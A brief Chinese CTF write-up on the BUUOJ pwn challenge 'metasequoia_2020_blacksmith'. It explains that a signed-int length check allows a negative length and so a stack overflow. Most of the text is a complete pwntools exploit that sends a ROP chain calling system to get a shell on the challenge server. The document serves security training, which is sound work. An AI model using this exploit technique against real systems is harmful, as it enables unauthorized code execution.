BUU-metasequoia_2020_blacksmith-WP
整数溢出,size_t是一个不小压力机器字长的无符号整型,然鹅判断长度的时候
这里用的是signed int,所以我们输入一个负数就可以轻松栈溢出了
exp
#!/usr/bin/env python
# coding=utf-8
from pwn import *
context(log_level = 'debug')
pop_rdi = 0x400b23
#sh = process("./metasequoia_2020_blacksmith")
sh = remote("node3.buuoj.cn",28754)
elf = ELF("./metasequoia_2020_blacksmith")
sh.sendlineafter("choice > ","1")
sh.sendlineafter("name?\n",'-1')
payload = 'a' * 0x40 + 'b' * 8 + p64(pop_rdi) + p64(0x400b48) + p64(elf.symbols['system'])
sh.sendlineafter("is?\n",payload)
sh.interactive()